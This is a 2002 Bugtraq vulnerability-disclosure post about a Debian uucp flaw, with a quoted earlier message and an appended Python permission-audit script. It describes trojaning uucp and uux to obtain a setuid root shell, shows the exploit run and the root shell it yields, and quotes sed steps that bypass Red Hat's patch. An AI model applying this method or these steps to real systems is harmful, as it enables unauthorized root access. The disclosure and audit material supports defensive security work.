[23930] in bugtraq
Re: uucp --config patch -- not sufficient
daemon@ATHENA.MIT.EDU (Charles 'core' Stevenson)
Tue Jan 22 00:24:33 2002
Message-ID: <3C4AA88D.6402E532@bokeoa.com>
Date: Sun, 20 Jan 2002 04:22:53 -0700
From: "Charles 'core' Stevenson" <core@bokeoa.com>
Reply-To: core@bokeoa.com
MIME-Version: 1.0
To: zen-parse <zen-parse@gmx.net>
Cc: bugtraq@securityfocus.com, Peter Palfrader <weasel@debian.org>
On debian the uucp and uux binaries are owned by the uucp user.
Additionally /usr/lib/uucp is writeable by the uucp user. This allows
us to have some fun since we don't have that nasty makewhatis, but we
can still get root by trojaning uucp and uux and hoping a root owned
process executes either one. Attached is an exploit based on zen's which
trojans uucp and uux transparently to root or the user by allowing
normal execution and hiding the true argv[0]. If root runs the command
we create a suid shell in /var/tmp.
[core@devastator:~/tmp/debian-uucp]$ ./exp-erm.sh
o Checking if uucp is installed
o Creating exploit files
o Sent the commands : Sleeping 2 seconds.
o Cleaning up /var/tmp
o Trojaning uucp and uux
o Running the uucp shell. You should remove this when you're done.
sh-2.05$ ls -l .sushi
-rwxrwxr-x 1 core core 5078 Jan 20 03:54 .sushi
Root haplessly runs uux or uucp:
root@devastator:~# uucp --help
Taylor UUCP 1.06.1, copyright (C) 1991, 92, 93, 94, 1995 Ian Lance Taylor
Usage: uucp [options] file1 [file2 ...] dest
-c,--nocopy: Do not copy local files to spool directory
-C,-p,--copy: Copy local files to spool directory (default)
-d,--directories: Create necessary directories (default)
-f,--nodirectories: Do not create directories (fail if they do not exist)
-g,--grade grade: Set job grade (must be alphabetic)
-m,--mail: Report status of copy by mail
-n,--notify user: Report status of copy by mail to remote user
-R,--recursive: Copy directories recursively
-r,--nouucico: Do not start uucico daemon
-s,--status file: Report completion status to file
-j,--jobid: Report job id
-W,--noexpand: Do not add current directory to remote filenames
-t,--uuto: Emulate uuto
-u,--usage name: Set user name
-x,--debug debug: Set debugging level
-I,--config file: Set configuration file to use
-v,--version: Print version and exit
--help: Print help and exit
Checking back in with the hacker we find a suid shell :)
sh-2.05$ ls -l .sushi
-rwsr-xr-x 1 root root 5078 Jan 20 03:54 .sushi
sh-2.05$ ./.sushi
sh-2.05#
Tested on stable and unstable. This exploit is not specific to any
certain arch.
Best Regards,
Charles 'core' Stevenson
zen-parse wrote:
>
> Problem: uucp patch from RedHat (possibly others) prevents
> original exploit, but not variations.
>
> Severity: Potential for local root on some distributions,
> uucp.uucp on others.
>
> https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=54466
>
> I had seen this report some time ago, and thought: "Good. They've got a
> bug report. That'll get it fixed. They'll check that before they release a
> new version, at least."
>
> They didn't.
>
> The patch does prevent the original exploit from working.
>
> However, a trivial patch to the exploit I posted makes it work again.
> local user -> uucp (via this problem) -> root (on some distributions, via
> /usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection characters'
> issue.)
>
> $ cd redhat7.0-uucp-to-root
> $ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
> $ mv tmp-exp-erm.sh exp-erm.sh
> $ ./runme
>
> and wait for /tmp/rootshell to appear.
>
> (Does anyone at RedHat actually read their bugzilla posts? Might it not be
> an idea to make anything flagged as security actually get looked at by
> someone? 2001-10-09 seems a long time for that to go unnoticed.)
>
> -- zen-parse
>
> --
> -------------------------------------------------------------------------
> 1) If this message was posted to a public forum by zen-parse@gmx.net, it
> may be redistributed without modification.
> 2) In any other case the contents of this message is confidential and not
> to be distributed in any form without express permission from the author.
> This document may contain Unclassified Controlled Nuclear Information.
[Attachment: debian-uucp.tar.gz (application/x-gzip)]
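
The precondition described in the message above (binaries owned by the uucp user and a directory writable by it) can be audited for directly. The following is an added example, not part of the original post or its attachment; it generalizes from uucp and uux to every executable in a list of directories, and the `trusted_uids` parameter and the choice of directories are assumptions.

```python
import os
import stat

def audit_executable(path, trusted_uids=frozenset({0})):
    """Return findings for one executable; an empty list means nothing flagged."""
    findings = []
    real = os.path.realpath(path)             # judge the file actually executed
    st = os.stat(real)
    if st.st_uid not in trusted_uids:
        findings.append(f"{real}: owned by uid {st.st_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{real}: group/world writable")
    # Write access to the parent directory allows unlink + recreate of the file.
    parent = os.path.dirname(real)
    dst = os.stat(parent)
    if dst.st_uid not in trusted_uids:
        findings.append(f"{parent}: directory owned by uid {dst.st_uid}")
    if dst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{parent}: directory group/world writable")
    return findings

def audit_dirs(dirs, trusted_uids=frozenset({0})):
    """Audit every executable regular file in dirs; return {path: findings}."""
    report = {}
    for d in dirs:
        try:
            names = sorted(os.listdir(d))
        except OSError:
            continue                          # missing or unreadable entry
        for name in names:
            full = os.path.join(d, name)
            try:
                mode = os.stat(full).st_mode
                if not (stat.S_ISREG(mode) and mode & 0o111):
                    continue
                found = audit_executable(full, trusted_uids)
            except OSError:
                continue                      # dangling symlink or race
            if found:
                report[full] = found
    return report

if __name__ == "__main__":
    # Assumption: root's PATH resembles this process's PATH; /usr/lib/uucp is
    # added because the message names it as writable by the uucp user.
    dirs = os.environ.get("PATH", "").split(os.pathsep) + ["/usr/lib/uucp"]
    for findings in audit_dirs(dirs).values():
        print("\n".join(findings))
```

Group-writable directories owned by a trusted group are reported as well and need manual review.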